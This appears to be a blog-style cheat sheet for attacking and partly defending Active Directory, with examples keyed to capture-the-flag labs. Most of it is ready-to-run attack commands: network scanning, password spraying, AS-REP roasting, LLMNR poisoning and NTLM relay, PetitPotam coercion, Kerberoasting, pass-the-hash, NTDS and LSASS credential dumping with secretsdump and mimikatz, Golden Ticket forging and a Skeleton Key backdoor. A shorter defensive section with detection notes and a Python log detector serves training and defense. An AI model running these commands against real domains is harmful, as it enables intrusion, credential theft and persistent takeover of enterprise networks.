# Active Directory Cheat Sheet for 2025

<figure><img src="https://cdn-images-1.medium.com/max/800/0*YMlH4El_HffbE7qz.png" alt=""><figcaption></figcaption></figure>

> *Active Directory is the spine of enterprise networks — break it, and the whole body collapses.*

Welcome to your **2025-ready Active Directory (AD) cheat sheet** — a masterkey reference combining offensive, defensive, and investigative commands. Whether you’re mapping domain forests as a red teamer or auditing misconfigs as a blue team analyst, this cheat sheet turns your recon into results.

This isn’t just theory — each section below is inspired by real-world labs and CTFs like **TryHackMe’s Attacking AD, Ignite, Wreath**, and **HackTheBox’s Labs** (free tier).

## Scan Network & Initial Enumeration <a href="#b68a" id="b68a"></a>

📌 Think of this like taking a flashlight into a dark room — you’re identifying where the machines live and how they talk.

**Lab Used**: *TryHackMe — Ignite (Free)*

* `nmap -sn <target_range>` — Sweep the subnet for life (ping scan only, no port scan).
* `nmap -Pn -sV --top-ports 50 --open <target_ip>` — Fingerprint the top talkers.
* `nmap -Pn --script smb-vuln* -p139,445 <target_ip>` — Check SMB doors for rusty locks.
* `cme smb <target_range>` — CrackMapExec meets Samba: Discover shares, users, and more.

## Active Directory Discovery <a href="#id-9b4d" id="id-9b4d"></a>

**Real-World Feel**: Like sneaking into a library and figuring out the floor plan before grabbing the rare books.

**Lab Used**: *TryHackMe — Attacking AD*

* `nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL` — Sniff out Domain Controllers.
* `dig axfr @dns_server domain.local` — (If misconfigured) grab every DNS record.
* `enum4linux -a -u "" -p "" <target_ip>` — Anonymous recon.
* `smbmap -u "guest" -p "" -P 445 -H <target_ip>` — Test for open access.

**Try This in Wreath**: Compare anonymous SMB access vs. guest login.

## Gaining Foothold: Attacks That Work <a href="#a15e" id="a15e"></a>

**This is your beachhead.** You’re not deep yet — but you’ve got a toe in the door.

**Password Spraying**

* `cme smb -u user.txt -p password.txt <target_ip>` — Blanket login attempts with caution.

**AS-REP Roasting**

```
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat
```

* **Demo This**: *TryHackMe — Wreath*, where one user lacks pre-auth and leaks hashes.

**LLMNR Poisoning + Relays**

```
responder -I tun0
ntlmrelayx.py -tf targets.txt -socks -smb2support
```

**PetitPotam NTLM Coercion**

* `PetitPotam.py -d DOMAIN.LOCAL <attacker_ip> <target_ip>` — Weaponized forced auth.

## Post-Exploitation & Lateral Movement <a href="#cf2a" id="cf2a"></a>

**This is where it gets cinematic.** You’ve got creds. Now you walk the domain.

**Real-Lab Example**: *HackTheBox — Offshore (Free)* has this exact flow with SMB shares, BloodHound ops, and user hops.

**BloodHound Collection**

```
bloodhound-python -d DOMAIN -u USER -p PASS -gc DC_IP -c all
```

**Enumerate Shares**

```
cme smb <target_ip> -u user -p pass --shares
```

**Kerberoasting**

```
GetUserSPNs.py -request -dc-ip DC_IP DOMAIN/USER:PASS
```

**Pass-the-Hash / Key**

```
evil-winrm -i <ip> -u user -H <NTLM hash>

wmiexec.py -hashes :NTLM user@target
```

## Domain Dominance <a href="#de7b" id="de7b"></a>

*Endgame begins.* You now own one machine. Time to own the forest.

**Credential Dumping**

```
secretsdump.py DOMAIN/USER:PASS@DC_IP # Get that juicy NTDS.dit.
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"
```

**Golden Ticket**

```
ticketer.py -nthash <krbtgt_hash> -domain-sid <sid> -domain DOMAIN <user>
```

**Skeleton Key**

`mimikatz "privilege::debug" "misc::skeleton"` — One key to rule them all.

## Blue Team & Detection Notes <a href="#id-2f66" id="id-2f66"></a>

**Defend like a hunter.** Here’s what defenders *should* be doing.

* Monitor PowerShell logs: `Sysmon + Winlogbeat + Elastic`.
* Detect Responder/LLMNR poisoning with: `Invoke-DetectResponder.ps1`.
* Enable SMB signing to nullify NTLM relays.
* Set `Audit Directory Services Changes` for object manipulation.
* Rotate `krbtgt` password twice after compromise.
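As an added example that is not part of the original post, the following Python applies the hunting logic behind these notes to Windows Security events 4768 (TGT requested) and 4769 (service ticket requested): it flags accounts logging on without pre-authentication (the condition AS-REP roasting relies on) and one account pulling RC4 service tickets for many SPNs (the Kerberoasting shape). The sample events, account names and the burst threshold are constructed for illustration; the field names follow the EventData names those two event IDs carry.

```python
"""Flag AS-REP roasting and Kerberoasting patterns in 4768/4769 events.

Constructed sample events, not real telemetry. Pre-Authentication Type 0
means "logon without pre-authentication"; encryption type 0x17 is RC4-HMAC.
"""
from collections import defaultdict

RC4_HMAC = "0x17"
BURST_THRESHOLD = 3  # distinct SPNs per account; assumption, tune per environment

# Constructed events using the EventData field names of 4768/4769.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-backup", "PreAuthType": "0",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.20"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.20"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc-sql",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc-web",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc-iis",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.50"},
]


def analyze(events):
    """Return a list of (rule, account, detail) findings."""
    findings = []
    rc4_spns = defaultdict(set)  # account -> distinct SPNs requested with RC4
    for ev in events:
        if ev["EventID"] == 4768 and ev.get("PreAuthType") == "0":
            # Account has "Do not require Kerberos preauthentication" set.
            findings.append(("asrep_roastable", ev["TargetUserName"], ev["IpAddress"]))
        elif ev["EventID"] == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC:
            svc = ev["ServiceName"]
            if svc.endswith("$") or svc.lower() == "krbtgt":
                continue  # machine accounts and TGT renewals are not roast targets
            findings.append(("rc4_service_ticket", ev["TargetUserName"], svc))
            rc4_spns[ev["TargetUserName"]].add(svc)
    for account, spns in rc4_spns.items():
        if len(spns) >= BURST_THRESHOLD:
            findings.append(("kerberoast_burst", account, f"{len(spns)} SPNs"))
    return findings


if __name__ == "__main__":
    for rule, account, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:20} {account:18} {detail}")
```

In production the same rules run over events shipped by Winlogbeat; the RC4 rule is noisy until legacy services are moved to AES, so allow-list those SPNs rather than raising the threshold.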

*TryHackMe — Security Analyst Path* offers hands-on SIEM and GPO audit labs.

## Hash Cracking Cheat Codes <a href="#id-80cb" id="id-80cb"></a>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*aLnasR6M2fDo9SSFRIybMw.png" alt=""><figcaption></figcaption></figure>

## Bonus: Custom Tools & Power Scripts <a href="#id-1f7e" id="id-1f7e"></a>

* `PowerView.ps1` – Swiss army knife for AD enum.
* `SharpHound.exe` – Native collector for BloodHound.
* `Invoke-Kerberoast`, `Invoke-UserHunter`, `Get-GPPPassword` – Part of PowerSploit.
* `adidnsdump` – Digs through DNS for fun and creds.

## Final Note <a href="#f19c" id="f19c"></a>

This isn’t a cheat sheet — it’s a tactical guide. Pair these commands with real labs, reflect on each step, and **don’t memorize — internalize**.

> *“The more silently you move in AD, the louder your skills speak.”*
